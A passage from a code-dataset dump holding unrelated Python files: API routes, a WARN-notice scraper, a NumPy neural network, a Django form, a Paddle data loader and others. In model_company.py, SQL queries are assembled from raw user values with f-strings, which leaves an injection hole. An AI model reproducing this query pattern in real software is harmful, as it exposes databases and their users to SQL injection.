NodeDocument.level == level,\n NodeDocument.position == position,\n )\n if not node_doc:\n return []\n # construct path up to root node\n path = [node_doc]\n parent_id = node_doc.parent_id\n while parent_id:\n parent_doc = await NodeDocument.get(parent_id)\n if parent_doc:\n path.insert(0, parent_doc)\n parent_id = parent_doc.parent_id\n else:\n parent_id = None\n\n return path\n\n\n@router.get(\n \"/nodes/{id}/path/options-by-head\",\n response_model=list[list[NodeRead]],\n status_code=status.HTTP_200_OK,\n)\nasync def get_path_options_by_head_id(\n node_id: Annotated[PydanticObjectId, Path(alias=\"id\")]\n) -> list[list[NodeDocument]]:\n \"\"\"\n Returns the options for selecting text locations derived from the node path of\n the node with the given ID as head.\n \"\"\"\n node_doc = await NodeDocument.get(node_id)\n if not node_doc:\n return []\n # construct options for this path up to root node\n options = []\n while node_doc and node_doc.parent_id:\n siblings = await NodeDocument.find(\n NodeDocument.parent_id == node_doc.parent_id\n ).to_list()\n options.insert(0, siblings)\n node_doc = await NodeDocument.get(node_doc.parent_id)\n # lastly, insert options for root level\n if node_doc:\n root_lvl_options = await NodeDocument.find(\n NodeDocument.text_id == node_doc.text_id,\n NodeDocument.level == 0,\n ).to_list()\n options.insert(0, root_lvl_options)\n return options\n\n\n@router.get(\n \"/nodes/{id}/path/options-by-root\",\n response_model=list[list[NodeRead]],\n status_code=status.HTTP_200_OK,\n)\nasync def get_path_options_by_root_id(\n node_id: Annotated[PydanticObjectId, Path(alias=\"id\")]\n) -> list[list[NodeDocument]]:\n \"\"\"\n Returns the options for selecting text locations derived from the node path of\n the node with the given ID as root. At each level, the first option is taken\n as the basis for the next level.\n \"\"\"\n node_doc = await NodeDocument.get(node_id)\n if not node_doc:\n return []\n # construct options for this path up to max_level\n options = []\n while node_doc:\n children = await NodeDocument.find(\n NodeDocument.parent_id == node_doc.id\n ).to_list()\n if len(children) == 0:\n break\n options.append(children)\n node_doc = children[0]\n return options\n\n\n@router.get(\"/layers/{id}/coverage\", status_code=status.HTTP_200_OK)\nasync def get_layer_coverage_data(\n layer_id: Annotated[PydanticObjectId, Path(alias=\"id\")], user: OptionalUserDep\n) -> list[LayerNodeCoverage]:\n layer_doc = await LayerBaseDocument.find_one(\n LayerBaseDocument.id == layer_id,\n LayerBaseDocument.allowed_to_read(user),\n with_children=True,\n )\n if not layer_doc:\n raise HTTPException(\n status.HTTP_404_NOT_FOUND, detail=f\"No layer with ID {layer_id}\"\n )\n return (\n await NodeDocument.find(\n NodeDocument.text_id == layer_doc.text_id,\n NodeDocument.level == layer_doc.level,\n )\n .sort(+NodeDocument.position)\n .aggregate(\n [\n {\n \"$lookup\": {\n \"from\": \"units\",\n \"localField\": \"_id\",\n \"foreignField\": \"node_id\",\n \"as\": \"units\",\n }\n },\n {\n \"$project\": {\n \"label\": 1,\n \"position\": 1,\n \"covered\": {\"$gt\": [{\"$size\": \"$units\"}, 0]},\n }\n },\n ],\n projection_model=LayerNodeCoverage,\n )\n .to_list()\n )\n","repo_name":"VedaWebProject/Tekst","sub_path":"Tekst-API/tekst/routers/browse.py","file_name":"browse.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"29664371253","text":"import logging\nimport re\nfrom pathlib import Path\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom .. import utils\nfrom ..cache import Cache\n\n__authors__ = [\"zstumgoren\", \"Dilcia19\"]\n__tags__ = [\"html\"]\n__source__ = {\n \"name\": \"Washington Employment Security Department\",\n \"url\": \"https://esd.wa.gov/about-employees/WARN\",\n}\n\nlogger = logging.getLogger(__name__)\n\n\ndef scrape(\n data_dir: Path = utils.WARN_DATA_DIR,\n cache_dir: Path = utils.WARN_CACHE_DIR,\n) -> Path:\n \"\"\"\n Scrape data from Washington.\n\n Arguments:\n data_dir -- the Path were the result will be saved (default WARN_DATA_DIR)\n cache_dir -- the Path where results can be cached (default WARN_CACHE_DIR)\n\n Returns: the Path where the file is written\n \"\"\"\n # Set the cache\n cache = Cache(cache_dir)\n\n output_rows = []\n\n with requests.Session() as session:\n # Request the initial page\n url = \"https://fortress.wa.gov/esd/file/warn/Public/SearchWARN.aspx\"\n user_agent = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0\"\n r = utils.get_url(url, user_agent=user_agent, session=session)\n\n # Save it to the cache\n html = r.text\n cache.write(\"wa/source.html\", html)\n\n # Parse out the headers\n soup = BeautifulSoup(html, \"html5lib\")\n table_list = soup.find_all(\"table\")\n first_table = table_list[0]\n first_row = first_table.find_all(\"tr\")[2]\n th_list = first_row.find_all(\"th\")\n headers = [_clean_text(th.text) for th in th_list]\n output_rows.append(headers)\n\n # Parse the data\n row_list = _parse_table(first_table)\n output_rows.extend(row_list)\n\n # Start jumping through the pages\n soup_content = BeautifulSoup(r.content, \"html5lib\")\n\n page = 2\n while True:\n try:\n # Post for the next page\n formdata = {\n \"__EVENTTARGET\": \"ucPSW$gvMain\",\n \"__EVENTARGUMENT\": f\"Page${page}\",\n \"__VIEWSTATE\": soup_content.find(\n \"input\", attrs={\"name\": \"__VIEWSTATE\"}\n )[\"value\"],\n \"__EVENTVALIDATION\": soup_content.find(\n \"input\", attrs={\"name\": \"__EVENTVALIDATION\"}\n )[\"value\"],\n }\n next = session.post(url, data=formdata)\n logger.debug(f\"Page status is {next.status_code} for {url}\")\n\n # Update the input variables\n soup_content = BeautifulSoup(next.content, \"html5lib\")\n\n # Cache the html\n html = next.text\n cache.write(f\"wa/{page}.html\", html)\n\n # Parse out the data\n soup = BeautifulSoup(html, \"html5lib\")\n table_list = soup.find_all(\"table\")\n first_table = table_list[0]\n row_list = _parse_table(first_table)\n output_rows.extend(row_list)\n\n # Up the page number\n page += 1\n\n # Once it fails, we're done\n except Exception:\n break\n\n # Set the export path\n data_path = data_dir / \"wa.csv\"\n\n # Write out the file\n utils.write_rows_to_csv(data_path, output_rows)\n\n # Return the path to the file\n return data_path\n\n\ndef _parse_table(table) -> list:\n # Parse the cells\n row_list = []\n for row in table.find_all(\"tr\"):\n cell_list = row.find_all([\"td\"])\n if not cell_list:\n continue\n cell_list = [_clean_text(c.text) for c in cell_list]\n row_list.append(cell_list)\n\n # Return it with a slice to cut the cruft\n return row_list[2 : len(row_list) - 2]\n\n\ndef _clean_text(text):\n \"\"\"Clean up the provided HTML snippet.\"\"\"\n if text is None:\n return \"\"\n text = re.sub(r\"\\n\", \" \", text)\n text = re.sub(r\"\\s+\", \" \", text)\n return text.strip()\n\n\nif __name__ == \"__main__\":\n scrape()\n","repo_name":"biglocalnews/warn-scraper","sub_path":"warn/scrapers/wa.py","file_name":"wa.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"73186842987","text":"import utils.meta\n\n@utils.meta.JSONClass\nclass LearningInfo:\n\n def __init__(self):\n super().__init__()\n self.confidence = []\n self.patterns_list = []\n self.pattern_width = []\n self.pattern_height = []\n self.pattern_timestamp = []\n self.segment_center_list = []\n self.patterns_value = []\n\n def __str__(self):\n return str(self.to_json())","repo_name":"hastic-zzz/analytics","sub_path":"analytics/analytic_types/learning_info.py","file_name":"learning_info.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"16875341906","text":"year = int(input(\"Enter Year:\"))\n\n#1 If the year is evenly divisible by 4, go to step 2. Otherwise, go to step 5.\n#2 If the year is evenly divisible by 100, go to step 3. Otherwise, go to step 4.\n#3 If the year is evenly divisible by 400, go to step 4. Otherwise, go to step 5.\n#4 The year is a leap year (it has 366 days).\n#5 The year is not a leap year (it has 365 days).\nleap_year = \"The year is a leap year (it has 366 days).\"\nnormal_year = \"The year is not a leap year (it has 365 days).\"\nif year % 4 == 0:\n if year % 100 == 0:\n if year % 400 == 0:\n print(leap_year)\n else:\n print(normal_year)\n else:\n print(leap_year)\nelse:\n print(normal_year)","repo_name":"smirachowdhary/Data-Structures-and-Algorithms","sub_path":"Decisions/Answers13_CheckIfGivenDateFallsInLeapYear.py","file_name":"Answers13_CheckIfGivenDateFallsInLeapYear.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35533811524","text":"import numpy as np \nimport h5py\nimport cv2\nimport os\nfrom glob import glob\n\n\n#////////////////////////testing some images//////////////////////////\ndef test():\n\tindex = 0\n\tfor i in range(10):\n\t\tcv2.imshow(\"image\",trainX[i])\n\t\tcv2.waitKey(1000)\n\t\tcv2.destroyAllWindows()\n\t\tprint(trainy[i])\n\n\n# n = 0 to n and arr of shape(x,)\ndef Y_generator(n,arr):\n\tx = arr.shape[0]\n\tY = np.zeros([n+1,x])\n\tfor i in range(x):\n\t\tnum = arr[i]\n\t\tY[num][i] = 1\n\n\treturn Y\n\n# test = np.array([0,1,2,3])\n# print(Y_generator(3,test))\n\n\n#/////////////// start writing neural network functions //////////////////////////////\n#retrieving parameters dictionary\n\n\n\n\n\ndef initialize_parameters(layers_dim):\n\tparameters = {}\n\n\t# for i in range(1,len(layers_dim)):\n\t# \tni = layers_dim[i-1]\n\t# \tni_next = layers_dim[i]\n\t# \tparameters[\"W\" + str(i)] = np.random.randn(ni_next,ni)*0.01\n\t# \tparameters[\"b\" + str(i)] = np.zeros([ni_next,1],dtype=int)\n\twith h5py.File(\"parametersnew.h5\",\"r\")as hf:\n\t\tfor l in range(3):\n\t\t\tnameW = \"W\" + str(l+1)\n\t\t\tnameb = \"b\" + str(l+1)\n\t\t\tparameters[nameW] = hf[nameW][:]\n\t\t\tparameters[nameb] = hf[nameb][:]\n\n\n\treturn parameters\n\n\ndef linear_forward(A,W,b):\n\tcache = (A,W,b)\n\tZ = np.matmul(W,A) + b\n\treturn Z,cache\n\ndef relu(Z):\n\tmask = (Z > 0)\n\tA = Z*mask\n\treturn A,Z\n\ndef sigmoid(Z):\n\tA = 1/(1+ np.exp(-Z))\n\treturn A,Z\n\n\ndef softmax(Z):\n\ttemp = np.exp(Z)\n\ttemp2 = temp.sum(axis=0)\n\tA = temp/temp2\n\treturn A,Z\n\ndef linear_activation_forward(A_prev,W,b,activation):\n\tZ,lin_cache = linear_forward(A_prev,W,b)\n\n\tif(activation == \"relu\"):\n\t\tA,act_cache = relu(Z)\n\t\t\n\n\telif(activation == \"sigmoid\"):\n\t\tA,act_cache = sigmoid(Z)\n\n\telif(activation == \"softmax\"):\n\t\tA,act_cache = softmax(Z)\n\n\tcache = (lin_cache,act_cache)\n\treturn A,cache\n\n\ndef L_model_forward(X, parameters):\n\n caches = []\n A = X\n L = len(parameters) // 2 # number of layers in the neural network\n \n # Implement [LINEAR -> RELU]*(L-1). Add \"cache\" to the \"caches\" list.\n for l in range(1, L):\n A_prev = A \n ### START CODE HERE ### (≈ 2 lines of code)\n Wl = parameters[\"W\" + str(l)]\n Bl = parameters[\"b\" + str(l)]\n A, cache = linear_activation_forward(A_prev,Wl,Bl,\"relu\")\n caches.append(cache)\n ### END CODE HERE ###\n \n # Implement LINEAR -> SIGMOID. Add \"cache\" to the \"caches\" list.\n ### START CODE HERE ### (≈ 2 lines of code)\n WL = parameters[\"W\" + str(L)]\n BL = parameters[\"b\" + str(L)]\n AL, cache = linear_activation_forward(A,WL,BL,\"softmax\")\n caches.append(cache)\n ### END CODE HERE ###\n \n return AL, caches\n\n\ndef compute_cost(AL, Y):\n m = Y.shape[1]\n\n # Compute loss from aL and y.\n ### START CODE HERE ### (≈ 1 lines of code)\n cost = np.sum(Y*np.log(AL))*(-1/m)\n ### END CODE HERE ###\n \n cost = np.squeeze(cost) # To make sure your cost's shape is what we expect (e.g. this turns [[17]] into 17).\n assert(cost.shape == ())\n \n return cost\n\n\n\ndef linear_backward(dZ, cache):\n \n A_prev, W, b = cache\n m = A_prev.shape[1]\n\n ### START CODE HERE ### (≈ 3 lines of code)\n dW = np.matmul(dZ,A_prev.T)*(1/m)\n db = np.sum(dZ,axis=1,keepdims=True)*(1/m)\n dA_prev = np.matmul(W.T,dZ)\n ### END CODE HERE ###\n \n assert (dA_prev.shape == A_prev.shape)\n assert (dW.shape == W.shape)\n assert (db.shape == b.shape)\n \n return dA_prev, dW, db\n\ndef linear_activation_backward(dA, cache, activation):\n \n linear_cache, activation_cache = cache\n \n if activation == \"relu\":\n ### START CODE HERE ### (≈ 2 lines of code)\n dZ = dA*(activation_cache >= 0)\n dA_prev, dW, db = linear_backward(dZ,linear_cache)\n ### END CODE HERE ###\n \n elif activation == \"sigmoid\":\n ### START CODE HERE ### (≈ 2 lines of code)\n dZ = dA*(sigmoid(activation_cache)[0]*(1-sigmoid(activation_cache)[0]))\n dA_prev, dW, db = linear_backward(dZ,linear_cache)\n ### END CODE HERE ###\n elif activation == \"softmax\":\n \tdZ = softmax(activation_cache)[0] - dA # Y_hat - Y is derivative wrt Z in softmax\n \tdA_prev, dW, db = linear_backward(dZ,linear_cache)\n \n return dA_prev, dW, db\n\n\n\ndef L_model_backward(AL, Y, caches):\n \n grads = {}\n L = len(caches) # the number of layers\n m = AL.shape[1]\n Y = Y.reshape(AL.shape) # after this line, Y is the same shape as AL\n \n # Initializing the backpropagation\n ### START CODE HERE ### (1 line of code)\n dAL = Y\n\n \n # Lth layer (SIGMOID -> LINEAR) gradients. Inputs: \"dAL, current_cache\". Outputs: \"grads[\"dAL-1\"], grads[\"dWL\"], grads[\"dbL\"]\n ### START CODE HERE ### (approx. 2 lines)\n current_cache = caches[L-1]\n grads[\"dA\" + str(L-1)], grads[\"dW\" + str(L)], grads[\"db\" + str(L)] = linear_activation_backward(dAL,current_cache,\"softmax\")\n ### END CODE HERE ###\n \n # Loop from l=L-2 to l=0\n for l in reversed(range(L-1)):\n # lth layer: (RELU -> LINEAR) gradients.\n # Inputs: \"grads[\"dA\" + str(l + 1)], current_cache\". Outputs: \"grads[\"dA\" + str(l)] , grads[\"dW\" + str(l + 1)] , grads[\"db\" + str(l + 1)] \n ### START CODE HERE ### (approx. 5 lines)\n current_cache = caches[l]\n dA_prev_temp, dW_temp, db_temp = linear_activation_backward(grads[\"dA\"+str(l+1)],current_cache,\"relu\")\n grads[\"dA\" + str(l)] = dA_prev_temp\n grads[\"dW\" + str(l + 1)] = dW_temp\n grads[\"db\" + str(l + 1)] = db_temp\n ### END CODE HERE ###\n\n return grads\n\n\ndef update_parameters(parameters, grads, learning_rate):\n \n L = len(parameters) // 2 # number of layers in the neural network\n\n # Update rule for each parameter. Use a for loop.\n ### START CODE HERE ### (≈ 3 lines of code)\n for l in range(L):\n parameters[\"W\" + str(l+1)] = parameters[\"W\" + str(l+1)] - learning_rate*grads[\"dW\" + str(l+1)]\n parameters[\"b\" + str(l+1)] = parameters[\"b\" + str(l+1)] - learning_rate*grads[\"db\" + str(l+1)]\n ### END CODE HERE ###\n return parameters\n\n\n\ndef L_layer_model(X, Y, layers_dims, learning_rate = 0.07, num_iterations = 3000, print_cost=False):#lr was 0.009\n\n costs = [] # keep track of cost\n \n # Parameters initialization. (≈ 1 line of code)\n ### START CODE HERE ###\n parameters = initialize_parameters(layers_dims)\n ### END CODE HERE ###\n \n adam= {}\n\n\n # Loop (gradient descent)\n for i in range(0, num_iterations):\n\n # Forward propagation: [LINEAR -> RELU]*(L-1) -> LINEAR -> SIGMOID.\n ### START CODE HERE ### (≈ 1 line of code)\n AL, caches = L_model_forward(X,parameters)\n ### END CODE HERE ###\n \n # Compute cost.\n ### START CODE HERE ### (≈ 1 line of code)\n cost = compute_cost(AL,Y)\n ### END CODE HERE ###\n \n # Backward propagation.\n ### START CODE HERE ### (≈ 1 line of code)\n grads = L_model_backward(AL,Y,caches)\n ### END CODE HERE ###\n \n # Update parameters.\n ### START CODE HERE ### (≈ 1 line of code)\n\n\n parameters = update_parameters(parameters,grads,learning_rate)\n ### END CODE HERE ###\n \n # Print the cost every 100 training example\n if print_cost and i % 30 == 0:\n print (\"Cost after iteration %i: %f\" %(i, cost))\n if print_cost and i % 100 == 0:\n costs.append(cost)\n \n # # plot the cost\n # plt.plot(np.squeeze(costs))\n # plt.ylabel('cost')\n # plt.xlabel('iterations (per hundreds)')\n # plt.title(\"Learning rate =\" + str(learning_rate))\n # plt.show()\n \n return parameters\n\n\n\n# parameters = L_layer_model(train_x, train_y, layers_dims, num_iterations = 2500, print_cost = True)\n\n\n\n#///////////////////////////////////////////////training session//////////////////////////////////////////\n#////////////////////@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@///////////\n\n# load dataset\npath = os.path.abspath('..')\npath1 = os.path.join(path,\"dataset\",\"train.hdf5\")\npath2 = os.path.join(path,\"dataset\",\"test.hdf5\") \n\n##loading training set\nwith h5py.File(path1,\"r\") as hf:\n\ttrainX= hf[\"image\"][:]\n\ttrainy = hf[\"label\"][:]\n\n\n## loading test set\nwith h5py.File(path2,\"r\") as hf:\n\ttestX= hf[\"image\"][:]\n\ttesty = hf[\"label\"][:]\n\n\n# trainy1 = Y_generator(9,trainy)\n# trainX = trainX.reshape(trainX.shape[0],-1)/255\n# trainX = trainX.T\n\n#define layers dimension\nlayers_dims = [784,16,16,10]\n\n\n# parameters = L_layer_model(trainX, trainy1, layers_dims, num_iterations = 1500, print_cost = True)\n\n\n# with h5py.File(\"parameters.h5\",\"a\")as hf:\n# \tfor l in range(len(parameters)//2):\n# \t\tnameW = \"W\" + str(l+1)\n# \t\tnameb = \"b\" + str(l+1)\n# \t\tWl = parameters[nameW]\n# \t\tbl = parameters[nameb]\n# \t\thf.create_dataset(nameW,data=Wl)\n# \t\thf.create_dataset(nameb,data=bl)\n\n\n#///////////////////////////////////////////////////////Testing session////////////////////////////////\n#now we got values of parameters its testing time\n\n\n\n\n# print(testX.shape)\n\n\n\n\n\n# AL_train,caches = L_model_forward(trainX,parameters)\n# AL_test,caches = L_model_forward(testX,parameters)\n\n# ans_train = AL_train.argmax(axis=0)\n# ans_test = AL_test.argmax(axis=0)\n\n# #train accuracy\n# accuracy_train = np.sum(ans_train == trainy)/len(trainy)\n# accuracy_test = np.sum(ans_test == testy)/len(testy)\n\n# print(\"train accuracy \",accuracy_train)\n# print(\"test accuracy \", accuracy_test)\n\n# got 95 % accuracy //////////////////////////////////\n\n\nparameters = {}\n\nwith h5py.File(\"parameters.h5\",\"r\")as hf:\n\tfor l in range(3):\n\t\tnameW = \"W\" + str(l+1)\n\t\tnameb = \"b\" + str(l+1)\n\t\tparameters[nameW] = hf[nameW][:]\n\t\tparameters[nameb] = hf[nameb][:]\n\n\n\ndef make_image_path_list():\n\t#abs_path of current directory\n\tPATH = os.path.abspath('.')\n\n\t#join the test and train folders path\n\tSource= os.path.join(PATH,'images')\n\tprint(Source)\n\t#search for png files in folder then sort the images according to their names\n\timages = glob(os.path.join(Source,\"*.jpeg\"))\n\tprint(images)\n\treturn images\n\nimages = make_image_path_list()\n\n\n\n#///////////////////////////////// testing your images //////////////////////////\n\nfor i in images:\n\tfilename = i\n\timg = cv2.imread(filename)\n\tgray_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\tgray_resized = cv2.resize(gray_img,(28,28),interpolation=cv2.INTER_AREA)\n\n\tgray_resized = ~gray_resized\n\n\n\tret,gray_resized = cv2.threshold(gray_resized,127,255,cv2.THRESH_BINARY)\n\n\tkernel = np.ones((2,2), np.uint8) \n\n\tgray_resized = cv2.dilate(gray_resized, kernel, iterations=1) \n\t# print(gray_resized)\n\tX = gray_resized.reshape(-1)\n\tX = X.reshape(len(X),1)\n\tX = X/255\n\n\tAL,caches = L_model_forward(X,parameters)\n\t# print(AL)\n\tprint(AL.argmax(axis=0))\n\n\tcv2.imshow(\"full\",gray_img)\n\tcv2.imshow(\"resized\",gray_resized)\n\tcv2.waitKey(4000)\n\tcv2.destroyAllWindows()\n\n\t\n\n\n\n# gray_resized = testX[1]\n# print(gray_resized)\n\n# cv2.imshow(\"resized\",gray_resized)\n# cv2.waitKey(5000)\n# cv2.destroyAllWindows()\n\n# X = gray_resized.reshape(-1)\n# X = X.reshape(len(X),1)\n# X = X/255\n\n\n# AL,caches = L_model_forward(X,parameters)\n# print(AL)\n# print(AL.argmax(axis=0))\n\n\n\n","repo_name":"gprince349/Handwritten-word-recognizer","sub_path":"digitRec_Ashish/NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":11106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13515658404","text":"import datetime\nimport logging\n\nimport localflavor\n\nfrom paying_for_college.models.disclosures import (\n DEFAULT_EXCLUSIONS,\n HIGHEST_DEGREES,\n School,\n)\n\n\nSTATES = sorted(\n [tup[0] for tup in localflavor.us.us_states.CONTIGUOUS_STATES]\n + [tup[0] for tup in localflavor.us.us_states.NON_CONTIGUOUS_STATES]\n + [\"PR\"]\n)\nDEGREE_COHORTS = {k: [] for k in HIGHEST_DEGREES.keys()}\nlogger = logging.getLogger(__name__)\n\n\ndef get_grad_level(school):\n \"\"\"Consider degrees higher than graduate level '4' as graduate degrees.\"\"\"\n if int(school.degrees_highest) > 4:\n return \"4\"\n else:\n return school.degrees_highest\n\n\ndef build_base_cohorts():\n \"\"\"\n Pre-build the base highest-degree cohorts.\n\n DEFAULT_EXCLUSIONS are the primary keys for the home offices of schools\n or school systems, plus our fake demo school, 999999.\n \"\"\"\n global DEGREE_COHORTS\n base_query = (\n School.objects.filter(operating=True, state__in=STATES)\n .exclude(pk__in=DEFAULT_EXCLUSIONS)\n .exclude(degrees_highest=\"\")\n )\n for key in DEGREE_COHORTS:\n DEGREE_COHORTS[key] += [\n school for school in base_query if get_grad_level(school) == key\n ]\n return base_query\n\n\ndef calculate_percentile_rank(array, score):\n \"\"\"Get a school score's percentile rank from an array of cohort scores.\"\"\"\n true_false_array = [value <= score for value in array]\n if len(true_false_array) == 0:\n return\n raw_rank = float(sum(true_false_array)) / len(true_false_array)\n return int(round(raw_rank * 100))\n\n\ndef rank_by_metric(school, cohort, metric):\n \"\"\"Return a school's percentile rank among a cohort by 3 metrics.\"\"\"\n values = [\n getattr(s, metric) for s in cohort if getattr(s, metric) is not None\n ]\n payload = {\"cohort_count\": len(values)}\n array = [float(val) for val in values]\n target_value = float(getattr(school, metric))\n payload.update(\n {\"percentile_rank\": calculate_percentile_rank(array, target_value)}\n )\n return payload\n\n\ndef run(single_school=None):\n \"\"\"Get percentile rankings for schools by degree, control, and state.\"\"\"\n count = 0\n starter = datetime.datetime.now()\n base_query = build_base_cohorts()\n if single_school:\n base_query = base_query.filter(pk=single_school)\n for school in base_query:\n by_degree = {}\n by_state = {}\n by_control = {}\n count += 1\n if count % 500 == 0: # pragma: no cover\n logger.info(\"{} schools processed\".format(count))\n # degree_cohort is the default, national base cohort\n # base query weeds out schools without state or degrees_highest values\n degree_cohort = DEGREE_COHORTS.get(get_grad_level(school))\n state_cohort = [\n s\n for s in degree_cohort\n if s and s.state and s.state == school.state\n ]\n # For school control, we want cohorts only for public and private;\n # We do not want a special cohort of for-profit schools\n if not school.control:\n control_cohort = None\n elif school.control == \"Public\":\n control_cohort = [\n s for s in degree_cohort if s.control == school.control\n ]\n else:\n control_cohort = [\n s for s in degree_cohort if s.control != \"Public\"\n ]\n for metric in [\"grad_rate\", \"repay_3yr\", \"median_total_debt\"]:\n if getattr(school, metric) is None:\n by_state.update({metric: None})\n by_control.update({metric: None})\n by_degree.update({metric: None})\n else:\n if state_cohort:\n by_state.update(\n {metric: rank_by_metric(school, state_cohort, metric)}\n )\n if control_cohort:\n by_control.update(\n {\n metric: rank_by_metric(\n school, control_cohort, metric\n )\n }\n )\n if degree_cohort:\n by_degree.update(\n {metric: rank_by_metric(school, degree_cohort, metric)}\n )\n school.cohort_ranking_by_state = by_state\n school.cohort_ranking_by_control = by_control\n school.cohort_ranking_by_highest_degree = by_degree\n school.save()\n logger.info(\n \"\\nCohort script took {} to process {} schools\".format(\n datetime.datetime.now() - starter, count\n )\n )\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/paying_for_college/disclosures/scripts/process_cohorts.py","file_name":"process_cohorts.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"70532800109","text":"from data.data_base import DataBase\nfrom data.models import model_user\n\ndef register_company(name, phone, idUser):\n\n register_company_sql = f\"\"\"\n INSERT INTO EMPRESAS(NOMBRE, TELEFONO, ID_USUARIO)\n VALUES ('{name}','{phone}', '{idUser}')\n \"\"\"\n\n bd = DataBase()\n bd.ejecutar_sql(register_company_sql)\n\n\n#Retorna id de la empresa\ndef search_id_company(email):\n\n idUser = model_user.search_id_user(email)\n \n\n select_id_company = f\"\"\"\n SELECT ID_EMPRESA FROM EMPRESAS WHERE ID_USUARIO='{idUser[0][0]}'\n \"\"\" \n \n db = DataBase()\n idCompany = db.ejecutar_sql(select_id_company)\n\n return idCompany[0][0]\n\n#Obtiene datos de la empresa\ndef get_data_company(idUser): \n\n select_id_company = f\"\"\"\n SELECT * FROM EMPRESAS WHERE ID_USUARIO='{idUser}'\n \"\"\" \n \n db = DataBase()\n data_company = db.ejecutar_sql(select_id_company)\n \n \n dict_company = {\n 'idCompany': data_company[0][0],\n 'nameCompany': data_company[0][1],\n 'tel': data_company[0][2],\n 'idUser': data_company[0][3]\n }\n\n \n return dict_company","repo_name":"ericseparovic/The-Clock","sub_path":"data/models/model_company.py","file_name":"model_company.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8885353431","text":"from django import forms\nfrom django.db.models import fields\nfrom .models import Subscribe\n\n\nclass EmailSubscribeForm(forms.ModelForm):\n email = forms.EmailField(widget=forms.TextInput(attrs={\n \"type\": \"email\",\n \"id\": \"email\",\n \"class\": \"form-control form-control-lg\",\n \"name\": \"email\",\n \"placeholder\": \"Email Address\",\n }), label=\"\")\n\n class Meta:\n model = Subscribe\n fields = ('email', )\n","repo_name":"sleekidd/learnhouse","sub_path":"subscribe/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22019921340","text":"import paddle\r\nimport os\r\nimport numpy as np\r\nimport cv2\r\nimport random\r\n\r\n\r\nclass MyDateset(paddle.io.Dataset):\r\n def __init__(self, mode='train', patch=512,\r\n watermark_dir='D:/yyc/competition/AIstudio/WatermarkRemoval/watermark_dataset/watermark_datasets.part/',\r\n bg_dir='D:/yyc/competition/AIstudio/WatermarkRemoval/watermark_dataset/bg_images/'):\r\n super(MyDateset, self).__init__()\r\n # 1->bg:\r\n # self.part_num = [1, 2, 3, 10]\r\n # self.bg_num = np.arange(0,552).tolist() + np.arange(1657, 1841).tolist()\r\n self.bg_num = np.arange(0, 1841).tolist()\r\n\r\n self.mode = mode\r\n self.watermark_dir = watermark_dir\r\n self.bg_dir = bg_dir\r\n self.patch_size = patch\r\n\r\n def __getitem__(self, index):\r\n bg_select = index % len(self.bg_num)\r\n bg_item = self.bg_num[bg_select]\r\n\r\n # 读入bg文件\r\n # bg_image_00000.jpg , bg 文件的命名方式\r\n label = cv2.imread(os.path.join(self.bg_dir, 'bg_image_' + str(bg_item).zfill(5) + '.jpg'))\r\n label = cv2.cvtColor(label, cv2.COLOR_BGR2RGB)\r\n H, W, _ = label.shape\r\n # label = paddle.vision.transforms.resize(label, (512,512), interpolation='bilinear')\r\n label = label.transpose((2, 0, 1))\r\n label = label / 255\r\n label = paddle.to_tensor(label).astype('float32')\r\n\r\n # 判断bg图片对应的水印文件所在的文件夹编号\r\n # if bg_select<184:\r\n # part_index = self.part_num[0]\r\n # elif bg_select<368:\r\n # part_index = self.part_num[1]\r\n # elif bg_select<552:\r\n # part_index = self.part_num[2]\r\n # else:\r\n # part_index = self.part_num[3]\r\n\r\n # 调整水印文件所在文件夹\r\n # watermark_dir_part = self.watermark_dir + str(part_index)\r\n watermark_dir_part = self.watermark_dir\r\n # print('watermark_dir_part', watermark_dir_part)\r\n\r\n # 随机选择20张水印文件作为网络输入\r\n watermark_num = np.random.randint(1, 531)\r\n\r\n # bg_image_00000_0001.jpg 水印文件的命名方式\r\n water_marker_list = []\r\n for k in range(0, 1):\r\n img = cv2.imread(os.path.join(watermark_dir_part,\r\n 'bg_image_' + str(bg_item).zfill(5) + '_' + str(watermark_num + k).zfill(\r\n 4) + '.jpg'))\r\n if img is None:\r\n print(os.path.join(watermark_dir_part,\r\n 'bg_image_' + str(bg_item).zfill(5) + '_' + str(watermark_num + k).zfill(\r\n 4) + '.jpg'))\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n # img = paddle.vision.transforms.resize(img, (512,512), interpolation='bilinear')\r\n img = img.transpose((2, 0, 1))\r\n img = np.expand_dims(img, 0)\r\n img = img / 255\r\n img = paddle.to_tensor(img).astype('float32')\r\n water_marker_list.append(img)\r\n water_marker_input = paddle.concat(water_marker_list, 0)\r\n\r\n wi = random.randint(0, (W - self.patch_size))\r\n hi = random.randint(0, (H - self.patch_size))\r\n\r\n water_marker_input = water_marker_input[:, :, hi: hi + self.patch_size, wi: wi + self.patch_size].squeeze(0)\r\n label = label[:, hi: hi + self.patch_size, wi: wi + self.patch_size]\r\n\r\n water_marker_input = paddle.vision.transforms.resize(water_marker_input, (256, 256), interpolation='bilinear')\r\n label = paddle.vision.transforms.resize(label, (256, 256), 